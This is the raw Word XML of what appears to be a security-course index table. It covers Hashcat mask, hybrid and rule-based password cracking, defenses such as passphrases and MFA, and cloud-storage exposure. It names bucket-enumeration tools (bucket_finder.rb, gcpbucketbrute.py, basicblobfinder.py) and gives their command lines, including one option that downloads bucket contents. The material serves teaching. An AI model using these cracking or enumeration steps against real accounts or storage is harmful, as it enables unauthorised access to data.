            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Each mask designation consists of multiple marker characters, each mask is for a given length, can specify multiple masks together.</w:t>
            </w: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DB7BB4" w:rsidRPr="006F5A04" w14:paraId="47F59145" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E6138A2" w14:textId="29A0F76E" w:rsidR="00DB7BB4" w:rsidRPr="006F5A04" w:rsidRDefault="00DB7BB4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hashcat Mask Attack example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C67399" w14:textId="1A0F699C" w:rsidR="00DB7BB4" w:rsidRPr="00DB7BB4" w:rsidRDefault="00DB7BB4" w:rsidP="00DB7BB4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="024D78C5" w14:textId="5C5348F5" w:rsidR="00DB7BB4" w:rsidRPr="006F5A0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711EDC47" w14:textId="09C0C0A5" w:rsidR="00DB7BB4" w:rsidRPr="006F5A0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52</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7BB4" w:rsidRPr="006F5A04" w14:paraId="49638135" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38111724" w14:textId="0F75365B" w:rsidR="00DB7BB4" w:rsidRPr="006F5A04" w:rsidRDefault="00DB7BB4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hashcat Hybrid Wordlist + Mask Attack – Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B18A09" w14:textId="0278CF0B" w:rsidR="00DB7BB4" w:rsidRPr="00DB7BB4" w:rsidRDefault="00DB7BB4" w:rsidP="00DB7BB4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>On the example, t</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB7BB4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ries all passwords in the wordlist, adding the mask characters to the end of each word. This is tremendously effective against large numbers of user accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70093975" w14:textId="7F420954" w:rsidR="00DB7BB4" w:rsidRPr="006F5A0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2CEE3492" w14:textId="228F0FA9" w:rsidR="00DB7BB4" w:rsidRPr="006F5A0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53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7BB4" w:rsidRPr="006F5A04" w14:paraId="10567148" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6816BCE2" w14:textId="15C4F19A" w:rsidR="00DB7BB4" w:rsidRDefault="00DB7BB4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hashcat Hybrid Mask + Wordlist attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B591373" w14:textId="54873370" w:rsidR="00DB7BB4" w:rsidRDefault="00DB7BB4" w:rsidP="00DB7BB4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>It tries all passwords in the wordlist, prepending the mask characters to the beginning of each word. This feature is less commonly applied through still useful.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="334C0B74" w14:textId="7AA49B3A" w:rsidR="00DB7BB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07603178" w14:textId="2064352F" w:rsidR="00DB7BB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54</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Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AA17736" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00F070C2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>In addition to flexible attack modes, Hashcat comes with password permutation rules.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78EDB07D" w14:textId="77777777" w:rsidR="00F070C2" w:rsidRDefault="00F070C2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Rules files mutate a wordlist with variations.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4358FD71"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t>Toggle the case of each letter in the word.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D2D761"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t xml:space="preserve">Replace e’s with 3’s, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a’s</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with 4’s (l33t speak).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D309D2"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lastRenderedPageBreak/>
              <w:t>Reverse words, capitalize the first letter, append a number, append a special character, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABE1126" w14:textId="0763F10F" w:rsidR="00F070C2" w:rsidRPr="00F070C2" w:rsidRDefault="00F070C2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Look at the Hashcat rules directory for examples.</w:t>
            </w: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46F97B3F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00D83D68">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows includes rudimentary password complexity enforcement:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB56BB3"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Can be enforces with group policy if you have Active Directory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71832D58"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Password length is one of the most valuable tools to force passphrase use when selecting passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="208E42AE"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Consider 20-character passphrases if possible.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6E7C54" w14:textId="3E63EDA2" w:rsidR="00D83D68" w:rsidRDefault="00D83D68">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UNIX systems can use Pluggable authentication Modules (PAM), use an external directory or local password length/complexity policies.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786CF439" w14:textId="0EE65795" w:rsidR="00D83D68" w:rsidRPr="00D83D68" w:rsidRDefault="00D83D68">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Avoid reset every 90 days policies as it makes it harder for users to remember passwords and leads to poor password selection or sticky-note reminders.</w:t>
            </w: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5D25F221" w14:textId="17D6AED4" w:rsidR="00303D06" w:rsidRDefault="00A7215C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Multi-factor authentication is the best defense against password cracking (and guessing/spray) attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE83358" w14:textId="77777777" w:rsidR="00A7215C" w:rsidRDefault="00A7215C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Make MFA a requirement for any new system introduced into your organization (on-premises or cloud)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AFB442E" w14:textId="0192A629" w:rsidR="00A7215C" w:rsidRPr="00A7215C" w:rsidRDefault="00A7215C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Leverage FIDO2-compliant standards for interoperability across platforms, public key cryptology with user-specific access restrictions. Supports multiple hardware devices for MFA.</w:t>
            </w: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67A1BE85" w14:textId="07C900CA" w:rsidR="00303D06" w:rsidRDefault="00F246F6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Fundamental could storage mechanism for modern applications, amazon S3 Buckets, Google Cloud Buckets, Azure Blobs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5059861B" w14:textId="1C473F6B" w:rsidR="00F246F6" w:rsidRDefault="00F246F6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Early could storage systems default to public access unless locked down otherwise. Led to a lot fo early S3 data compromise.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09284651" w14:textId="3BD0E94D" w:rsidR="00F246F6" w:rsidRPr="00F246F6" w:rsidRDefault="00F246F6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Many enterprises still create cloud storage with public access, possibly intended only for public content distribution, later, users add sensitive information that can expose the organization.</w:t>
            </w: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F246F6" w:rsidRPr="006F5A04" w14:paraId="2497CED4" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41380B82" w14:textId="25DE745F" w:rsidR="00F246F6" w:rsidRPr="006F5A04" w:rsidRDefault="00F246F6" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AWS bucket: creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E1E569E" w14:textId="77777777" w:rsidR="00F246F6" w:rsidRDefault="00F246F6" w:rsidP="00F246F6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CED9D74" w14:textId="62232871" w:rsidR="00F246F6" w:rsidRPr="006F5A04" w:rsidRDefault="00F246F6" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12BE2B82" w14:textId="3CFAF3AC" w:rsidR="00F246F6" w:rsidRPr="006F5A04" w:rsidRDefault="00F246F6" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>64</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5F136F78" w14:textId="2A7818B9" w:rsid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Cloud storage providers provide universal HTTP access to data, easy to access and for application integration.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C59335E" w14:textId="03E1EA94" w:rsidR="00F246F6" w:rsidRP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Endpoint URLs are consistent for each major cloud provider.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2446E2B5" w14:textId="23ADD6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17BDD66" w14:textId="77777777" w:rsidR="00303D06"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 xml:space="preserve">https://www.googleapis.com/storage/v1/b/BUCKETNAME  </w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidR="0093480F" w:rsidRPr="00776D53">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>https://ACCOUNTNAME.blob.core.windows.net/CONTAINERNAME</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="76EADAC2" w14:textId="02D22E70" w:rsidR="00F246F6" w:rsidRPr="006F5A04" w:rsidRDefault="00F246F6" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>An Attacker that wants to enumerate storage need only visit the desired URL, guessing the name value(s).</w:t>
            </w:r>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2959FD58" w14:textId="77777777" w:rsidR="00303D06"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Storage Scanning: AWS S3</w:t>
            </w:r>
            <w:r w:rsidR="00F246F6">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B9745FF" w14:textId="65923320" w:rsidR="00F246F6" w:rsidRPr="006F5A04" w:rsidRDefault="00F246F6" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bucket finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C8A967D" w14:textId="7818D725" w:rsidR="00F246F6" w:rsidRP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 xml:space="preserve">Takes a wordlist of names and identifies if the </w:t>
            </w:r>
            <w:r w:rsidR="009408F6">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bucket</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> exists, and if it is accessible. Optionally download all resources using </w:t>
            </w:r>
            <w:r w:rsidR="009408F6">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="009408F6">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">dowload. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51CAF1CF" w14:textId="34C033A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3D3205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bucket_finder.rb words </w:t>
            </w:r>
            <w:r w:rsidR="009408F6">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>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5CA7C8C6" w14:textId="22303A6D" w:rsid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Identifies and enumerates permissions on Google cloud buckets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3E2531" w14:textId="11C602AC" w:rsid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lastRenderedPageBreak/>
              <w:t>Uses a permutation wordlist to create common variation on a single bucket name or searches all bucket names in a supplied file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74614724" w14:textId="7976539F" w:rsidR="009408F6" w:rsidRP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Does not download files; use gsutil.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7327EB45" w14:textId="42FC1B1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gcpbucketbrute.py -u -k falsimentis  gsutil ls gs:/falsimentis-dev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0EB53C2" w14:textId="58914975" w:rsidR="009408F6" w:rsidRPr="00BA3BB4" w:rsidRDefault="009408F6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA3BB4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Accepts a list of accountname:contai</w:t>
            </w:r>
            <w:r w:rsidR="00BA3BB4" w:rsidRPr="00BA3BB4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nername strings, identifies public Azure storage instances.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58BBE34C" w14:textId="7CA31659" w:rsidR="00BA3BB4" w:rsidRPr="00BA3BB4" w:rsidRDefault="00BA3BB4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA3BB4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Non-delimited strings are used as both the account and container name.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6175B982" w14:textId="3EF9216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namelist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E04096" w14:textId="4B72E2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basicblobfinder.py namelist</w:t>
            </w:r>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Listable: enumerate and download  Writable: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6E41A13E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00BA3BB4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
